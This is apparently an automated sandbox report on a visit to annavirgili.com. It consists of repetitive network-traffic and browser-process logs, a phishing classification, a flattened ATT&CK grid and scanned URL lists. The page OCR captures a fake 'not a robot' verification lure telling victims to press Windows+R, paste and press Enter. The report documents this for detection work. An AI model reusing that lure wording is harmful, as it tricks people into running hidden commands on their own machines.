        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
        Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
        Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
        Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
        Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
        Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
        Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
        Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
        Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
        Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
        Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
        Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
        Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
        Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
        Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
        Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
        Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
        Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
        Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
        Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
        Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
        Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
        Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
        Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
        Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
        Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
        Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
        Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
        Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
        Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
        Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
        Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
        Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
        Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
        Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir6824_42985262Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir6824_42985262Jump to behavior
        Source: classification engineClassification label: mal56.phis.win@18/423@55/17
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=2008,i,16923723258563330455,8692166982377769583,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20241208-180523.718000 --mojo-platform-channel-handle=2228 /prefetch:11
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://annavirgili.com"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=2008,i,16923723258563330455,8692166982377769583,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20241208-180523.718000 --mojo-platform-channel-handle=2228 /prefetch:11Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected

        Persistence and Installation Behavior

        barindex
        Source: Chrome DOM: 1.3OCR Text: Complete these Verification Steps To better prove you are not a robot. please: Press & hold the Windows Key R I. In the verification window. press Ctrl + V, 2. Press Enter on your keyboard to finish, 3. You will observe and agree: Perform the steps above to VERIFY finish verification,
        Source: Chrome DOM: 1.1OCR Text: Complete these Verification Steps To better prove you are not a robot. please: Press & hold the Windows Key + R. 2. In the verification window. press Ctrl + V- 3. Press Enter on your keyboard to finish. You will observe and agree: Perform the steps above to VERIFY finish verification,
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire Infrastructure1
        Drive-by Compromise
        Windows Management Instrumentation1
        Browser Extensions
        1
        Process Injection
        1
        Masquerading
        OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
        Process Injection
        LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
        File Deletion
        Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
        Ingress Tool Transfer
        Traffic DuplicationData Destruction
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        http://annavirgili.com0%Avira URL Cloudsafe
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://annavirgili.com/wp-content/uploads/2022/10/Progetto-senza-titolo-2024-09-04T092536.181-1000x0%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3.0%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/themes/ciena/assets/css/customize.css?ver=1.0.80%Avira URL Cloudsafe
        https://annavirgili.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fannavirgili.com%2F0%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js?ver=3.6.40%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/themes/ciena/inc/elementor/widgets/assets/js/fmtpl_theme_elementor.js?ver=1.0.80%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=6.6.10%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/plugins/gtranslate/flags/16/it.png0%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc.6.6.10%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js?ver=3.0%Avira URL Cloudsafe
        https://annavirgili.com/trasparenza/0%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/themes/ciena/assets/vendors/js-offcanvas/js-offcanvas.pkgd.min.js0%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/uploads/2022/10/Home-3-1-300x193.jpg0%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/ext/label/css/html_types/label.css?ver=3.3.00%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/themes/ciena/assets/js/theme.js?ver=1.0.80%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/uploads/2022/10/Progetto-senza-titolo-2024-09-04T092536.181-1024x0%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/plugins/elementor/assets/lib/font-awesome/webfonts/fa-brands-400.woff20%Avira URL Cloudsafe
        https://www.themepunch.com/support-center0%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/uploads/fgcheck.min.js?ver=1.00%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/img/delete.png);background-si0%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/0%Avira URL Cloudsafe
        https://annavirgili.com/privacy-policy/0%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css0%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/plugins/revslider/public/assets/assets/loader.gif0%Avira URL Cloudsafe
        https://annavirgili.com/xmlrpc.php?rsd0%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/ext/image/css/html_types/image.css?ver=3.3.00%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3.6.10%Avira URL Cloudsafe
        https://annavirgili.com/monogram/0%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/plugins/fami-templatekits/assets/css/fmtpl-menu.css?ver=1.0.40%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/html_types/select.js?ver=3.3.00%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver=0%Avira URL Cloudsafe
        https://annavirgili.com/wp-json/0%Avira URL Cloudsafe
        https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/ion.range-slider/css/ion.r0%Avira URL Cloudsafe
